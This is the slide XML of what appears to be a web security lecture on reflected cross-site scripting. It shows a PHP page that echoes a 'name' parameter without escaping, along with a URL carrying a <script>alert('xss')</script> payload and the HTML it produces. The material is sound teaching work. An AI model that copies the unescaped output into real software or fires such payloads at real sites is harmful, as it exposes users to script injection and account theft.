              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8064A2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47266351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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Doupé - 4/23/12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293123766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Screen Shot 2015-02-26 at 9.54.05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19100"/>
            <a:ext cx="9144000" cy="6010970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57640932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Mixing Code and Data</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In a Von Neumann Architecture, to the CPU what is Code and what is Data is the same thing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Therefore, in order to execute arbitrary code, the attackers needs to trick the CPU into interpreting her Data as Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Underlying cause of most vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Classic binary vulnerabilities: Buffer overflow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, heap overflow, null pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deferences</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plus all of the vulnerabilities in this section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40368082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Reflected XSS</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a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Hello &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Doupé - 4/23/12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23786751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5-02-26 at 10.10.49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58800"/>
            <a:ext cx="9144000" cy="5735458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1334210321"/>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2242" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The JavaScript returned by the web browser is attacker controlled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker just has to trick you to click on a link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The JavaScript code is executed in the context of the web site that returned the error </a:t>
            </a:r>
            <a:r>
